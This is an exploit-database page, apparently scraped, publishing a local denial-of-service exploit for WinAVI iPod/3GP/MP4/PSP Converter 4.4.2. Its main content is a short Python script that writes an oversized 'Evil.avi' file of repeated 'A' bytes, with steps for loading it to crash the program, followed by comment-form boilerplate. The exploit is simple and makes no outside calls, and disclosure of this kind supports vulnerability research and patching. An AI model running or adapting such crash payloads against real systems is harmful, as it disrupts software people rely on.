WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 Denial Of Service

2019.03.19

Credit: Achilles

Risk: Low

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

# Exploit Title: WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 Local Dos Exploit
# Date: 16.03.2019
# Vendor Homepage:http://www.winavi.com
# Software Link: http://www.winavi.com/user/download/WinAVI_iPod_3GP_MP4_PSP_Converter.exe
# Exploit Author: Achilles
# Tested Version: 4.4.2
# Tested on: Windows XP SP3 EN
# Windows 7 x64 Sp1
# 1.- Run the python script, it will create a new file with the name "Evil.avi"
# 2.- Open WinAVI.exe and Click 'Convert to iPhone'
# 3.- Load the file "Evil.avi"
# 4.- And you will see a crash.
#!/usr/bin/env python
buffer = "\x41" * 6000
try:
f=open("Evil.avi","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 Denial Of Service

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.